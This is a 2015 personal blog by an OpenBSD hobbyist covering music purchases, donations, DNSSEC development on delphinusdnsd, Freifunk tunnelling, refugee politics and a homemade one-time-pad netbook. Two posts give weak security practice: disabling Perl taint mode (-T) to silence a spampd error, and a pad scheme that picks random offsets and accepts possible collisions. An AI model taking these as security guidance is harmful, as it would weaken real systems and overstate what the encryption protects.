that the vernal equinox back then was really close to the constellation
Aries. Given mistakes in calculations I beg to tell that Jesus's death
was the start of a new age, the Age of Pisces. The time when the vernal
equinox would be in the constellation pisces for 2160 years or so. It isn't
exactly 2160 years but close. The next age is Aquarius and I wonder if Jesus
will reappear just before that time too. Now you may think that this is too
Astrologic mumbo jumbo... but the fact is that with precession of the
equinoxes the point in the sky for the vernal equinox moves in retrograde
fashion.
Bought two singles
April 22nd, 2015
I bought Tommy Lee Sparta's Hero and Spartan Soldier. Thanks goes to SVPRadio
for making me aware of the first song, and I took a liking to the second as
well it reminds me of the Film that I watched in german called 300. Thanks
goes to Youtube for teasing me to buy this.
Donated 50 euros to OpenBSD
April 22nd, 2015
Forgot about blogging this. Last friday I made the transaction to Theo.
This is the 2nd quarter donation bringing up donations to 100 euros for this
year.
And the Park seemed inviting
April 24th, 2015
My doctors always tell me I should walk more in order to get healthier so I
went to the park today.
Sorta like what Carl Sagan said about the cosmos, we've tested the water and
the water seemed inviting. I think I'll be doing more of this this spring.
Happy 25th anniversary Hubble!
April 24th, 2015
25 years ago the Hubble Space Telescope was launched into low earth orbit.
It allowed astronomers to see stars, nebulas, galaxies and other universe
properties without having to worry about cloud cover interference. Happy
Birthday Hubble!
Feel free to browse through any of these, there is some real awesome photos
especially in the first link (check it's archive).
OpenBSD getting hammerfs through GSOC?
April 28th, 2015
Google has announced their students for Google Summer of Code. OpenBSD is
participating and I think the highlight is porting HAMMER2 to OpenBSD. Here
is an introduction to HAMMER
at DragonFlyBSD's website. I'm intrigued and excited, but also a little
concerned whether I'd be able to run hammer with all its options. Nonetheless
a brilliant code!
Goodbye Avon!
April 29th, 2015
When my family and I immigrated to Canada in 1987 (we eventually returned to
Germany) I attended Avon Public School for grade six. Checking up on
Stratford News I noticed the school building closed in 2005 and just recently
torn down / demolished.
I guess the school only remains a memory now more than before.
No indication on what caused it though. I did have a lot of chinese IP's
try to log in as root on my sshd on port 1022 though. Anyways the httpd
is back up.
OpenBSD CD's delayed, upgraded anyways
May 2nd, 2015
Well my May 1st went like always. Early in the morning I ftp'ed my OpenBSD
stuff that I needed to upgrade to 5.7. And I upgraded my computers here at
home throughout the day. I believe the OpenBSD store apologized and said
they'd be shipping the CD's around May 7th. There was talk of a damaged
master CD and the delay at the manufacturing plant producing the CD's. DeRaadt
mentioned this is the first time in 20 years this has happened. I wonder what
outside forces caused this... oh well we'll never know.
My setup with chrome being exported from another account stopped working, and
I didn't realise it. I noticed I couldn't move the window anymore, it was
stuck where it opened. So I thought the windows manager was to blame and I
tried out kde4. KDE4 is good and all but I couldn't set a timezone. Then
after 2 logins it wouldn't load and left me with a blank screen after login.
It had to go. So I went back to fluxbox wm and got rid of the chrome browser
hack, now chrome worked fine. This leaves me somewhat vulnerable but at least
I can paste urls again, a feature that was greatly missed.
Pension, TV and Books
May 8th, 2015
I managed to get a raise of pay. I can now restart paying into a pension fund
and perhaps I'll get that TV. I haven't had a TV in probably 17 years that I
owned. I have an Apple TV that I'd connect to it and watch youtube probably,
LOL. Also I'll be able to buy more books this year. I'm all around happy.
I'll also have to pay catch up to last year since last year the CADEUR
(virtual currency, CAD and EUR exchange rate) was not in my favour. This
year it seems to be picking up again to 2013 values.
Where do you get your clothes?
May 9th, 2015
Here in Schweinfurt we had one store catering to oversized people (fittingly
called Goliath). In early 2014 they closed. So what I do is get my clothes
online. My T-Shirt size is 6XL so going shopping in regular stores is out of
the question. Just recently I bought a whole batch of boxershorts and
t-shirts for like 200 euros from Adamo.
The payment and delivery were flawless (per DHL). If you know of any other
online stores catering to oversized people in Germany or EU let me know, I'd
be interested.
Purchased more Reggae
May 9th, 2015
I have bought today the Demarco True Friend EP, and Jah Vinci - best of Jah
Vinci album. I'll be listening to these shortly.
Purchased DJ mixer
May 12th, 2015
Back when I was 19 I had a Gemini ScratchMaster mixer. This mixer I just
bought is far from the thing I had back then.
It connects via USB to Mac and IOS devices. It was only 124 euros so I felt
it was affordable. I plan on DJ'ing for SVPradio where I'd construct a mixing
session and DJ Jaz downloads it and streams it to the server. Should be
interesting anyhow.
Donated 25 euros toward Nepal
May 12th, 2015
I have donated 25 euros for the Nepalese people. I used
Spendenkonto Nothilfe to
transfer the funds from my bank account. Here's to hoping for recovery for
the nepalese people.
Anexit
May 13th, 2015
I had a chance to talk to Anexit on IRC today. He asked me
what my webpage was and I asked his anexit.net,
very interesting blog he's got. Anexit is experienced with BSD and this makes
it so great to talk to him. Lately he's very busy with his baby daughter but
otherwise you could catch him at a BSDCan conference.
Freifunk Tunnel Masters
May 15th, 2015
As you may know freifunk.net tunnels to the outside world. I have made
another step. Instead of tunneling to the freifunk.net servers directly
from my DSL I'm tunneling through a VPS of mine first. This has the benefit
that I can encrypt the traffic leaving the DSL and it can't be picked up
by my ISP when they compare a list of servers whether I have freifunk.net.
I'm using my udptunnel program that is still closed source but I plan on
overhauling it as it doesn't quite encrypt just yet, it just HMAC's. Gonna
work on that this weekend. If you don't know what I mean above just think
of a tunnel that gets tunneled. My vps is showing 5% more CPU on average
and I suspect it's a similar story with my router here at home. Also right
now I do about 200 GB of traffic so my VPS sees twice that amount. Because
the VPS is in Amsterdam there is more latency on the freifunk link, but it
gets discounted the fastpath on my DSL, so it's about even as if I had just
changed providers.
OpenBSD 5.7 arrived
May 15th, 2015
15 days after I installed 5.7 on all my systems the CD's arrived. This
doesn't really make me mad. But then I checked CD2 and this is what i found:
mercury# cd /cdrom
mercury# ls
5.7 OFWBOOT PORTS SHA256.SIG
HARDWARE PACKAGES README TRANS.TBL
mercury# more TRANS.TBL
D 5.7 5.7
F HARDWARE HARDWARE
F OFWBOOT ofwboot
^^^^^^^^
notice the ofwboot should have been lowercase when I read the CD. This is
probably a broken disk. It still doesn't make me mad. I got a great booklet
and stickers, and that makes me very happy. The CD's are probably coasters
and I hope the plant screwup doesn't repeat itself for 5.8. I'm glad to
support Theo de Raadt and OpenBSD, even when the CD's are screwed up once in
a while, they are still a plastic receipt that I buy into this product.
Holidays less than a month away
May 19th, 2015
I'm looking forward to my holidays. Simply because I'll be working on
Delphinusdnsd to put DNSSEC into it. I hope I will succeed with that, it's
my major personal project for this year and I hope I don't get side-tracked.
I've got 3 weeks to get something written. I'm looking forward to releasing
delphinusdnsd 1.0.0 in November 2015.
My udptunnel program is open source now
May 21st, 2015
The udptunnel that I use to tunnel freifunk with is now open source. You
can look at it
through here. Enjoy.
Pre-Ordered Ten of Hearts
May 21st, 2015
I have pre-ordered Alaine's Ten of Hearts album, which is scheduled to be
released in 5 days or so. I have Alaine's Without You album and I like how
she sounds.
Advocacy for OpenBSD
May 21st, 2015
On the OpenBSD Journal there was an article
that featured this article
to show among others that OpenBSD is and I quote "an important ingredient in
an EU strategy for more security and technological independence".
When I came to the EU, I had OpenBSD 3.1 in my pocket with me and I used this
almost at any opportunity. I have been lucky. I grew up with this stuff in
Canada since age 19 and OpenBSD releases since 2.5. Right now I don't have a
consumer router but rather an enterprise router made by Soekris running
OpenBSD. I plan on getting a PC-Engines APU router to run OpenBSD on it
soon. Both these routers allow me this security and technological
independence, talked about in the above article. The consumer routers over
and over again prove to be unreliable and faulty security wise.
Computers are better Rappers? Perhaps...
May 22th, 2015
I grew up on hip hop and rap in my teenager years. I had a language burden
to overcome and it wasn't easy, but I think I got the point. Now then
researcher in Finland have developed a rapping algorithm called
deep beat (german link). And this may be good and all and I'm
sure the algorithm will be used to produce Hip Pop, but what the mainstream
media never knew was that it wasn't the glorious rappers that interested us.
We wanted to hear the message, and the perfection of a human to deliver this
on to us. Now you can write a rhyme and practice it but how well are you
gonna be in freestyling. That's where people get mad respect. Sure they
recycle parts they practiced before probably but rapping from the head top
isn't an easy thing. In my experience hip hop was the experience itself and
that can't be told, you have to experience that yourself. I look up to the
god and my friends who gave me a message that was, what's the word, benevolent.
If you want to understand I invite you to watch
40 years of Hip Hop by
KRS-One. I can't guarantee you'll understand it but he tries to teach
you. My personal take on hip hop is that to repeat what I experienced in the
1990's you'd have to time travel, it cannot be repeated. Some qualities and
friendships remain from that time because we know what we went through in
those days. I am gonna stop, there is no words to this...
Purchased another Album
June 4th, 2015
This one is from Richie Spice "Book of Job". I'm going to listen to it now.
Vacation in a week
June 5th, 2015
I go on vacation in a week. I'm really excited. I hope I'm going to
get a lot of programming done then, as I have 3 weeks vacation.
Purchased two Books
June 6th, 2015
I haven't purchased a book in at least three months. It's time to get
something fresh. I got: Postfix: The Definitive Guide (Classique Us), Kyle Dent... and Hacking Exposed Wireless: Wireless Security Secrets and Solutions, Joshua Wright and Johnny Cache. These will give me something to read during the
holidays and perhaps inspire me.
I'm on Vacation
June 13th, 2015
Finally! Now the Delphinus DNS is gonna get dusted off and I'll be planning
how I'm gonna do this in the next few days. I have 3 weeks to get something
working. Also the summer
solstice will be around in a week or so. Be
prepared for that! It's when the sun is at its highest in the northern
hemisphere and at its lowest in the southern hemisphere. It is also the
official start of summer in the northern hemisphere until the september
equinox.
Delphinusdnsd Hack days, entering production..
June 18th, 2015
This is a status update of how my progress on putting DNSSEC
into delphinusdnsd is going. I haven't started on the DNSSEC part yet but
I have partitioned/fragmented the database structure on delphinusdnsd with
the underlying BerkeleyDB. I then had to iron out a few bugs also caused
by taking out code. I was able to put delphinusdnsd into production today
but I'm monitoring it carefully. At any time I can switch back the old
stable wildcarddnsd that was running on io.solarscale.de until today.
Next steps are to look at how my zone signer tool is working, it'll likely
take me a bit since it's written in ruby. You won't see this tool until
later it's not in the CVS tree yet. For those curious in watching what
is being changed can see so at the delphinusdnsd viewvc.
I'm still in the process of ironing out bugs and adding functionality...stay
tuned!
Happy Solstice!
June 21st, 2015
Solstice was great, but we had full cloud cover and it spit a little from
above too. Anyhow tomorrow I'm going to be back programming on DNSSEC for
Delphinusdnsd and i'm really looking forward to it. Cheers!
Donated 150 euros to the Red Cross
June 22nd, 2015
The city that I live in (Schweinfurt) is getting a refugee centre which is
in a part of the old Ledward Baracks, where the US Army used to be in. They
are opening the centre in July I believe. It serves as a 1st contact site
for refugees who are expected to stay in the city for up to 3 months. The
Red Cross is overlooking clothing the refugees who aren't expected to have
much clothing with them, so I have donated 150 euros and my family added
50 euros more making a total of 200 euros donation. The website of the
local red cross is here.
BTW yes this is the same Red Cross that I worked for a year as told on my
resume.
Delphinusdns Project sponsors Luke Antins
June 22nd, 2015
I have sponsored Luke Antins to add on some resource records on his
Ruby dns-zone gem. I'll
need this gem to do a conversion tool between BIND and DelphinusDNS
zonefiles, and especially do background conversion between signed zones.
Luke accepted to the work and it's expected to be done by the
time I get around to starting the ruby conversion tool, some time next
week. Luke has a website at float64.uk.
I'm absolutely thrilled about this and I'm so glad that we're able to do
this on an open source basis.
Art display of my parents creations
June 23rd, 2015
My mother and my dad are showing off their work, at the Kunsthalle Schweinfurt
starting on the 26th of June until the 12th of July. My mom is a potter and
my dad is a photographer, both their work will be on display.
If you're around the Schweinfurt area and appreciate good art, perhaps this
will interest you. This may be my parents last display together, so this is
a unique view of their display suitably called "signatures of time -
double play". I'll likely visit this art exhibit on friday when I'm in the
area of the art gallery. I won't be at the opening unfortunately.
Vacation cut short
June 24th, 2015
Unfortunate events at work have cut my vacation short. I'm back working.
What does this mean for delphinusdnsd? I don't know I can't finish it on
my vacation now. I'll see if I can get some time off in september or so.
Donated 50 euros to OpenBSD
June 25th, 2015
I just wrote a 50 euro donation to Theo de Raadt. I'll be bringing the
transfer to the bank tomorrow.
RFC 4034 compliant AFAIK
June 25th, 2015
I have added NSEC, and DS RR's to delphinusdnsd in the last 24 hours. I
believe with a bit of converting effort a signed DNSSEC zone being served
would be possible. But I don't want to stop there yet. I still want to
do NSEC3 and NSEC3PARAM (RFC 5155). And a frontend to a zonesigning tool
written in Ruby will be on the menu too, not sure when I have time for that
though. You can check out the CVS repo at
emea.centroid.eu if this interests you at all.
Status update on Delphinusdnsd and DNSSEC
June 28th, 2015
Well a lot was done but a lot of work remains.
NSEC and NSEC3 need to be added to NOERROR and NXDOMAIN replies
SOA replies need NSEC* I think.
PTR replies and CNAME still need RRSIG addons
Any replies and AXFR still need to be including the new RR's
The ruby conversion tool needs to be finished, right now I'm converting
BIND style zones by hand
And then I need to go through the checklists and debug. I think I'll do that
in October when I perhaps will get another holiday for a week (to make up for
my cancelled vacation). I figure there is about 2-3 more weeks of work left
to do (at about 1-2 hours a day).
AKW Grafenrheinfeld has shut down over night
June 28th, 2015
According to this article at telepolis the nuclear power plant at
Grafenrheinfeld which is about 8 km's from here has shut down, forever, last night. I'm very happy about this. Here is a picture of this plant:
The linked article tells that there is 8 nuclear powerplants left in Germany.
I hope they shut soon as well.
I have donated 20 euros to the Greece bailout fund
July 3rd, 2015
There is a fundraiser going on to bail out Greece. I first read about this here.
So I have added 20 euros to this fund. If everyone in the EU donates 20 euros
then we'd have bailed them out over 5 times the amount. Or if every family of
five spends 20 euros we'll have hit the mark. Good luck Greece!
Power outtage this morning
July 4th, 2015
We had a power outtage this morning and a transformer exploded
causing a 40 minute outtage to many parts of Schweinfurt. All my computers
have reset but thankfully none were damaged. I had one router with a 4000 hour
uptime or so, it has now reset. So I'm not gonna learn from this because I
already made plans to buy a bunch of UPS's in late August. It'll be three in
total one for my setup in my living room, one for the hallway and one for my
home office. Hoping the electricity grid will hold until then.
It definitely was hotter than 2003
July 6th, 2015
Yesterday was the hottest day on record, seriously (since 1884 when records
started being kept). Spectacularily we had a thunderstorm and lots of
lightning yesterday night when the darkness came. It lowered the temperature
by half in a matter of 1 hour or so. Now we have 23 degrees C and a bit of
breeze, but it's probably gonna get hot again.
Freifunk was affected by an MTU issue
July 7th, 2015
A router at the N-IX exchange point caused fragmented packets of my tunnel
to be thrown out. Here is the traceroute:
venus# traceroute io.solarscale.de 1538
traceroute to io.solarscale.de (78.47.14.22), 64 hops max, 1578 byte packets
1 ppp-default.m-online.net (82.135.16.28) 16.24 ms 16.091 ms 15.946 ms
2 xe-2-0-1.r5.nue1.m-online.net (212.18.6.79) 16.252 ms 16.225 ms 16.196 ms
3 * *^C
The third hop would have been:
3 nix-gw-2.hetzner.de (195.85.217.30) 6.837 ms 7.292 ms 7.099 ms
So I have notified hetzner.de of this routing issue. Many protocols require
fragmentation including dns with DNSSEC. But also my freifunk tunnels required
this and for the past three weeks service was affected. Sorry to my
freifunkers who have seen problems. I have routed to my backup tunnel which
doesn't have this issue.
Signatures of Time - Double Play
July 9th, 2015
Today I was at my parents art exhibition at the Kunstverein Schweinfurt. It
was excellent, I really enjoyed it. I made this photo.
After I had lunch with my parents, and was able to congratulate them on a
very good exhibition. They told me some articles were already sold. Those
with a red dot near them, which I didn't notice but I'm happy for them.
Hand-Down and a Story
July 10th, 2015
I have handed down the above items to someone in Erlangen city as a gift to
Freifunk Franken. The items are
2 x 20 feet of Wifi antenna cable with barrel connectors on each end and a
2.4 GHz Antenna possibly a Lucent. I bought these in Toronto in the year
2000.
Back in 2000, I wanted to be a provider of internet services (I still do).
And wifi came on the scene. I envisioned back then that perhaps I could
network a neighbourhood and have them downstream of a 10 Mbit/s ethernet to
another provider. So I bought as a test base 3 wifi cards of the pcmcia type
and 3 antennas and 2 cables of the above kind. I never got to play with these
because of a missing component which was called pigtails. And I was extremely
busy so I never got around to playing with these. The dream wasn't crushed
it just never was fulfilled.
Today there is a citizen
organisation called Freifunk in Germany that pretty well does all this stuff
that I envisioned back then. It's 15 years later now, progress was made.
I'm fairly happy with how things are going so I'm parting with this stuff.
Status update of Delphinusdnsd and DNSSEC
July 10th, 2015
I didn't get much done last week since it was too hot. The weather has
calmed a little and it's gotten cooler so I'm anxiously waiting to get back
to it. I'm currently working on NSEC3 replies on NXDOMAIN and NOERROR answers.
I still have to do AXFR and ANY answers, as well as DS replies upon delegation
requests. Then comes the challenging part of writing a ruby wrapper to sign
zones. I have lots of time until release though which will be in November.
I'm gonna take it in stride.
Purchased Reggae
July 11th, 2015
I have gotten an EP and a Riddim:
Her Name is Denyque - Denyque
City Life Riddim
I'll be listening to this now.
Purchased Netbook
July 13th, 2015
Almost 3.5 years after getting my last netbook, I have gotten a new one. It'll be here in
6-9 business days. It's an Acer Aspire V3 I believe...
yep. I'm crossing my fingers that this
laptop allows OpenBSD to run because of the UEFI thing that discourages
users of open source. Anyhow this netbook is similar to the old perhaps a bit
faster. I'm using both netbooks for a project of mine, meaning I won't keep
them long. Details of the project will emerge in time.
Donated $15 to FreeBSD Foundation
July 15th, 2015
15 seems to be the number of the day, it was spontaneously picked. It's
interesting that the US dollar and the Euro are almost 1:1. Anyhow this
concludes my yearly donations to FreeBSD, I still have a bit of money for
OpenBSD to be distributed next season (after september).
My CryptoBook
July 17th, 2015
I purchased an Acer Aspire V3-112. It didn't get
full support
from OpenBSD. But that's not what I purchased it for. I will now reveal
what I purchased it for. My Uncle asked me "how do you encrypt?", and I told
him "it's very difficult". There is several factors why it's difficult.
Encryption is very hard to do right as a programmer
Encryption tools that promise full privacy often lie
Often complexity gets in the way of something that should be simple.
My Uncle seemed a little impatient with me. I told him that a one time
pad is perfect encryption given the fact that the pad is not repeated, and
it's simple to make. We left it at that. But it got me thinking how I can
give the gift of encryption to my Uncle. And I thought of my netbook which
was affordable still and runs OpenBSD, if I could give him a netbook that does
everything then we solved a problem.
So I bought pluto (computer) this netbook. At first I envisioned writing the
OTP program in X11 but when pluto turned out to not like X11, I turned toward
the console. I wrote a script that calls a compiled program that handles the
one time pad. As it turned out the script didn't function right and I had to
rewrite it in C. So imagine you get a netbook and you turn it on and it says
this:
So the protocol I developed works on a one time pad. The pad can be generated
with this cryptobook. OpenBSD has a fairly cool random number generator,
however, to guarantee complete safety this cryptobook does not talk over the
network. It can't I have removed all network drivers from the kernel. So
the only way to transfer files to/from this cryptobook is with a memstick.
Just as long as you know that a memstick with a FAT32 filesystem can only hold
a 4 GB sparse file minus one byte. That would be the pad. Now OpenBSD takes
all sorts of sources for entropy, but I have removed the network drivers and
everything else is pretty much guessable. So I have turned the microphone
on permanently as a background job that writes everything it hears to /dev/null.
When generating the pad I hope someone is gonna listen to some funky music that
stirs the random number generator well.
Back to the protocol. Since my dad told me, my Uncle doesn't send too much
mail in a year, the problem of keeping track of offsets of the pad pretty well
solved itself. I generate a random number for the offset of the pad. Now
there is a chance that there is a collision which renders the message useless.
But I think we'll get lucky with low encrypted traffic. So what happens is
you put the documents you want encrypted into a special directory. Then you
chose "encrypt" on the cryptobook and it chooses those files in the directory
to be encrypted by the pad. Similarily to decrypt there is another directory
to stick encrypted files in and it'll decrypt them. The offset of the pad is
part of the header on encrypted files.
I'm going to leave it at that. If there is more to write I'll do so later.
I'm proud of this little project.
Macbook Pro and things
July 23rd, 2015
Yesterday, I bought a Macbook Pro. This wasn't a spontaneous decision, it
was something I planned for a longer time. I also bought some other things
like an external keyboard (USB Mac) an Intel NUC and a 10 port USB 3.0 Hub
(although it only gets detected as a 2.0 Hub for some reason). I also
bought Windows 8.1 and I'm looking forward to upgrading it to Win 10. On
my old netbook saturn (computer) I migrated the windows 7 off there to a
vmware fusion vm, it also will see a win 10 upgrade. So I was configuring
everything yesterday as i was copying it over and I had a few things that
caused me pain. In vmware fusion running OpenBSD and the mac keyboard made
the @ sign disappear. I fixed that with researching the manpages and googling.
Here is my .xsession as it looks finally:
This allows me to use the keyboard with the @ sign at Alt-L. The ^ sign and
> and < signs are reversed on the keyboard still but it beats having to
not find the @ sign. I do use the OpenBSD vm for my main things, as I'm in
my comfort zone with this. It's a little slower than working with the Xeon
which is going to get repurposed into a private cloud computer running bhyve
on FreeBSD, but it's an Core i5 after all on this Macbook Pro.
I'll have pictures once I have everything set up like I want it. Right now
I'm out of 220V electricity ports and I'm going to soon order my UPS backup
solutions that I also wanted to get.
Purchased the Kingston Jamaica Riddim
July 24th, 2015
I liked this riddim when I heard Demarco sing to it. So I purchased it.
It's nice.
New Network Plans
July 24th, 2015
I wrote this on a pad today. (Yes it's the pads given out at
EuroBSDCon 2011). I'm testing something with beta.swshell.de, something
that may make me some money. So temporarily that's how it'll look.
Two CryptoBooks side by side
July 25th, 2015
Opinion: Hacking Team are pigs
July 27th, 2015
I recently read something that hacking team said they are "victims". Yet
they are the ones that sold malware to governments far and wide to
infiltrate computers at border points or via the Internet. These guys are
low of the low. A good hacker in my mind is a defensive one, not an aggressive
offensive one. So these guys are far from good.
This brings up another point. Germany's defence minister is playing with the
thought of installing an offensive cyber capability in the german military.
What a mistake! Again, work up your defenses not offenses. As the only
victims in an offensive military are civilians and we are the ones who really
need help.
Delphinusdnsd status update
July 28th, 2015
Well the hot days are over I believe. So I'm itching to get back to this.
Perhaps next week I'll be able to write some code as this week is filled in
my schedule.
CryptoBooks virtualized
August 2nd, 2015
In order to make use of cryptobook in more parts of my family I have
virtualized it. That sorta defeats the point but buying a cryptobook
does tend to get expensive. Here is a vmware version of cryptobook:
And here is a virtualbox version of cryptobook:
These aren't for sale unfortunately.
Bought Reggae
August 6th, 2015
I have purchased Romain Virgo's album "The System", it's an older album but
I used to watch his videos on youtube.
.. and a Riddim
August 8th, 2015
There is only four songs on the Cloud Nine Riddim. But it's sweet. Too bad
they couldn't pack-in an instrumental to this.
Ordered a Book from Amazon
August 9th, 2015
I bought Design and Implementation of the FreeBSD Operating System, by
McKusick et al. Second edition! Having looked through this book I can
tell it'll be insightful. I bought the Design and Implementation of the
4.4BSD Operating System from the same author around 1996. I had struggled
with it, it's not an easy read and they recommend a Tanenbaum for newbies
first. Which I did, (buy a Tanenbaum) and it was worth it. Now only I hope
there is some similarities left between FreeBSD and OpenBSD like mbuf's. :-).
Can't port something without understanding both systems anyhow. So.. that
only leaves someone to write Design and Implementation of the OpenBSD System,
hint hint. Anyhow I think this McKusick book will be great.
Spampd and taking the -T out
August 9th, 2015
I must have wasted 2 hours trying to get spampd to work on a FreeBSD jail with
most recent ports. This was the error message:
Aug 09 11:15:51 testmail spampd[86796]: 2015/08/09-11:15:51 Insecure dependency
in open while running with -T switch at /usr/local/lib/perl5/site_perl/Net/ \
Server/Daemonize.pm line 75. at line 179 in file /usr/local/lib/perl5/ \
site_perl/Net/Server.pm
I tried everything, permissions, and ownership changes and all would work. So
finally I figured out that -T belongs to perl and not spampd or spamassassin.
when taking it out in /usr/local/sbin/spampd in the first line it worked. I
don't know enough of the implications of this but I'm sick of wasting a
sunday afternoon on a stupid -T. It stays off.
root@testmail:/usr/local/etc/rc.d # perl --version
This is perl 5, version 20, subversion 2 (v5.20.2) built for amd64-freebsd-thread-multi
Copyright 1987-2015, Larry Wall
I started shuffling my $HOME/.ssh directory
August 10th, 2015
There have been reports (real reports) of firefox allowing a remote attacker
from reading ssh keys. To make it harder on the attacker I'm shuffling my
.ssh directory with this script:
An Identityfile entry in my config file points to the right id_rsa file. Which
btw is passphrased, thank god! It would be folly I believe to have no
passphrase on my ssh keys. Don't be lazy!
I shuffle every 5 minutes per crontab.
Still in a Consumer Rush
August 16th, 2015
I'm still in a consumer rush. I hope it quells soon. I just purchased
another quad gigabit ethernet card for my soekris router. This brings
the gigabit ports on the soekris to twelve. I'm also very interested in
the raspberry pi for some reason again. Not so much the rpi that I have
but the rpi 2 which has double the RAM and 4 cores. If I were to put together
the soekris and 10 RPI boards I'd have a small supercomputer. I'm currently
testing the possibility of this. I'm brainstorming uses too.
And still in the Rush...
August 17th, 2015
I couldn't resist looking at raspberry pi stuff and came across a battery
pack unit. I thought this was good for a portable CryptoPi made the same
way as a CryptoBook, only cheaper. If it works out I'll be able to exchange
it with my Uncle who by now is in possession of the silver cryptobook.
OpenBSD 5.8 Pre-orders are on
August 19th, 2015
I have preordered my copy of OpenBSD 5.8 which will be released on October 18
which deraadt says is the anniversary of a Makefile he first committed in the
OpenBSD tree. It's the OS's 20th anniversary. If you're interested in
obtaining OpenBSD on CDROM go to https://openbsdstore.com and look for OpenBSD
version 5.8. Be sure to click on the EU symbol if you want to pay in euros.
With my preorder I also ordered a poster this time. It should look good in my
apartment.
Maxed my Soekris 6501
August 21st, 2015
I have maxed the soekris net 6501 I have with 12 interfaces. 5 are used and
5 are possibly going to be used in the near future.
It took 3 years or so to assemble all this, finally it's completed. The
latch to make sure the cards don't move did not fit in and I couldn't screw
it on, too bad.. a slight misdesign by soekris. One just has to be careful
with this one when transporting it.
Changes at work
August 22nd, 2015
The company I work for has been sold. Or better yet it has been aquired by
another company. I worked there for 6 hours a day since 2012 and in total
5 years. Finally I told on my resume where I work. We were a very small
company so I always felt it was better to keep secret where I work. Now
it's in the open.
The company that aquired us want to retain everyone on staff. I've been
offered an "after hours support" position at the NOC at that company. They
promise more money, which is nice but I'm gonna have to work extra hard to
establish a trusting relationship. It scares me somewhat because trust
establishment is not like respect. Respect you can earn, but trust is a
two way street, and it's subtle.
Since I am a remote worker everything hits me especially hard, since I'm not
in the office. It's a stressful time for me and I hope I'll be able to get
over it soon. Right now at work we're in a transition, from our system to the
other system. The company that aquired my work sits in the USA, this is almost
a repeat of what I saw in 1999 when another US company took over the Canadian
ISP I worked for. Americans have a liking on buying Canadian companies. :-)
Back in 1999 I quit the company, but I watched the other people who didn't and
they had a fairly solid job for a few years at least. Instead of panic'ing I'm
gonna take it in stride this time, perhaps something positive will evolve out
of this. Whether it's gonna work is written in the star perhaps. But I'm
gonna have to say goodbye to the canadian systems we've built and nurtured.
I won't be that "canadian ghost" that works in the real early hours of the
morning. Now I'm in new territory, it's a little scary, as it's unfamiliar
to me.
I'm always glad I have a blog to get things off my chest. To whomever reads
this.
Bought a Reggae Album
August 24th, 2015
This time it's Konshens - Mental Maintenance. The first few songs sounded
great!
Ordered two books from Amazon
August 25th, 2015
I have ordered:
The definitive guide to HTML5 Websocket - Vanessa Wang
HTML5 und CSS3: Das umfassende Handbuch - Jürgen Wolf
I plan on using these books to make a remote serial console for a bhyve
guest. Dunno if it'll work or not.
Omega: a new VPS
August 26th, 2015
I got a new VPS based in Frankfurt, Germany. It's called omega.virgostar.net.
I'm going to be using this one for a testbed with DNSSEC. With that I'm going
to have to split my domains a little bit. io.solarscale.de and
supercluster.virgostar.net will become a pair for serving my current domains.
Then I'm going to take my test domain (swshell.de) and transfer it to a new
pair consisting of omega.virgostar.net and americas.centroid.eu. In this
constellation I'm going to test DNSSEC, until either the test is done or
americas.centroid.eu expires. I'm not going to renew it, meaning in may
2016 I'll have three VPS again instead of four. This is positive as four VPS's
is starting to become a bit much to manage.
Resisting Refugees is Shameful
August 27th, 2015
If you are against the refugee situation in Germany and greater Europe look
into your heart. There is people fleeing a civil war and poverty, disease and
of course violence of the highest degree. I'm for taking in refugees and I
support it with money as well (200 euros went to the Red Cross this year for
support of refugees). I don't believe anti-refugee violence should be
tolerated here. And I just can't believe that there is people so ignorant of
the refugees who are in dire need of help. They say haters are gonna hate,
but it's a shame that haters become physical threats. Shame on those hateful
people who stand in refugees way. That's all I wanted to say.
Cancelling io.solarscale.de, eventually
August 29th, 2015
io.solarscale.de wasn't meant to be around forever. I've had it a number of
years now at hetzner online. So hetzner came out with a new line of VPS's.
A certain config of it I don't like at all, so when I tried getting a new
VPS with them I got stuck with that, I cancelled it right away. No way!
So I'm in the process of migrating everything to omega.virgostar.net and
supercluster.virgostar.net (the former for mail, the latter for web). I
just set up the IPSEC tunnel between those two hosts, it's looking promising.
Changed DNS setup
August 31st, 2015
I have partitioned my zones between four nameservers (two sets). swshell.de
is a testdomain and is served by io.solarscale.de and americas.centroid.eu.
I will test dnssec on these eventually. The rest of my domains are served
by omega.virgostar.net and supercluster.virgostar.net. This is a thinning
out and I hope I don't experience a double failure on either set but then
nothing would work anyhow anymore.
The last homely house on Earth
September 5th, 2015
Or... next stop, the Moon. This photo is my favourite photo of 2015.
I did this partially because I needed something easy to do. Where I left
off in June/early July was boring and complex work. I am trying to get
back into the swing of things now. There is lots to do still before the
1.0.0 release. If I don't make it by November 15th, it will be postponed
until the new year in 2016 most likely.
Equinox in less than 2 Weeks
September 10th, 2015
On September 23 at 8:20 GMT is equinox. After that point the nights will
become longer again and the days shorter. Yes, winter is inevitable.
That day is also the start of Autumn (or Fall) and usually the leafs from
the trees will turn in colours and eventually fall to the ground. Frost
will return...then perhaps snow putting its blanket on the leafs that fell.
Insects will rest, other wildlife will have a harder time getting food.
This is the seasons of the northern hemisphere. I think it's great!
Purchased Reggae
September 10th, 2015
This time it's Exco Levi - Country Man. He's a migrant to Canada like me!
Ordered a book from Amazon
September 10th, 2015
I ordered the "Computer Security Handbook" by Seymour Bosworth et al. It
cost a lot of money, but it's a thick book (2000+ pages). I was made aware
of this book when I googled the domain of my place of work and it came up.
Apparently a link in the book is to our servers, which interests me. Oh well
here is hoping to it being good.
I'm not hiring
September 15th, 2015
People are sending me resumes of what I can tell from the envelope. I'm not
opening resumes as I'm not hiring. I look at these as attempts of phishing.
Thanks. Also I'd like to say that I'd love to be hiring, had I money. Sad
truth is that I'm not rich.
Happy September Equinox!
September 23th, 2015
As I write this there is about 30 minutes until it's truely equinox. Happy
Equinox! I turned the heat to 1 (out of a possible 3 settings) today as it
was quite chilly overnight. This morning I looked up the temperature at
10 degrees Celsius. Since these are night heating units it'll take 1 or 2
days for them to reach their heating potential.
European Union where is your strength?
September 26th, 2015
The fact that all of Syria
only represents ~4 percent of all
EU citizens makes
it a sad chapter in Europe as a whole that we can't "grow" 4%. And not only
that there is talk of 800,000 refugees this year which is 0.16% of the
European population. And even then if you were to take all 60 million
refugees worldwide that's only 12% of the EU citizen base. I just can't
believe that some Central European nations within the EU don't want to take
their fair share of refugees. Where is our conscience?
Why are europeans
so xenophobic when it comes to our neighbours? Let me spell it out for you
2000 years ago Syria was part of the Roman Byzantine Empire and is a
mediterranean nation. This means it is on the same Mediterranean as Italy
and Spain. Have you not realised by now that the ground you're on in Europe
is not yours? You're only a steward of managing this ground as is everyone
